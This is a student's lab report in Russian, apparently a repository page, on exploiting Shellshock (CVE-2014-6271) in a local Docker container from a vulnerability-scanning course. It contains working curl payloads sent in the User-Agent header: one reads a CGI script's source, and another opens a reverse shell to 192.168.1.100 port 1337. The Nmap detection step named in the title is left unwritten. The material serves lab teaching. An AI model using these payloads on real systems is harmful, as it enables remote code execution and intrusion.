Files
2024-03-26 19:36:57 -04:00
..
2024-03-26 19:36:57 -04:00
2024-03-26 19:36:57 -04:00
2024-03-26 19:36:57 -04:00
2024-03-26 19:36:57 -04:00
2024-03-26 19:36:57 -04:00
2024-03-26 19:36:57 -04:00
2024-03-26 19:36:57 -04:00

Модуль 2. Сканирование на уязвимости. Сетевые сканирования

Практическое задание №2

Задание №1. Детектирование Shellshock с помощью Nmap

  1. Скачаем репозиторий и соберем Docker-контейнер

alt text

  1. Запустим контейнер командой docker run -d -p 80:80 --name shellshock marker689/shellshockable

  2. Посмотрим вывод CGI-скрипта.

curl http://localhost/cgi-bin/shockme.cgi

alt text

Вывод соответствует коду в CGI-скрипте:

#!/usr/local/bin/bash
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
  1. Выполним эксплуатацию уязвимости Shellshock

curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://localhost/cgi-bin/shockme.cgi

alt text

#!/usr/local/bin/bash
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"

Мы раскрыли содержимое скрипта, также можно сделать ревер-шелл.

  1. curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.100/1337 0>&1'" http://localhost/cgi-bin/shockme.cgi

alt text

  1. Приступим к написанию

Итог лабораторной работы

На этом лабораторная работа окончена, файл отчет в формате pdf во вложении.

Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.